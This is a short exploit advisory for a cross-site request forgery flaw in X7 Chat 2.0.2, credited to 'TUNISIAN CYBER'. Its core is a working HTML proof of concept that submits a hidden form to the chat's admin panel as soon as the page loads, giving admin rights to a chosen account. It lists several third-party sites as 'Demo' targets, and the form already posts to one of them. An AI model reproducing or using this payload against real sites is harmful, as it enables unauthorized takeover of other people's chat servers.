facebook facebook twitter rss

X7 CHAT 2.0.2 CSRF Add Admin Vulenrability

Author: TUNISIAN CYBER , Published: 13-12-2013
[+] Author: TUNISIAN CYBER
[+] Exploit Title: X7 CHAT 2.0.2 CSRF Add Admin Vulenrability
[+] Date: 13-12-2013
[+] Category: WebApp
[+] Vendor:http://www.x7chat.com/‎
[+] Google Dork: Do Some Work and you'll find it :)
[+] Tested on: Win7 , ubuntu 13.04


########################################################################################
<html>
<body onload="document.xform.submit();">
<form name="xform" action="http://www.ahleenarab.com/chat/index.php?act=adminpanel&cp_page=users&update=USER" method="post">
<input type="hidden" name="username" value="USER" />
<input type="hidden" name="usergroup" value="PASSWORD" />
</form>
</body>
</html>

Change USERNAME and PASSWORD

Demo:
http://www.ahleenarab.com/chat/
http://www.chat4u.eb2a.com/chat/
http://users.atw.hu/zenechat/chat/
http://www.zenechat.atw.hu/chat
http://filip.yw.sk/Chat/
########################################################################################
Greets to: XMaXtn, N43il HacK3r, XtechSEt

Like us on Facebook :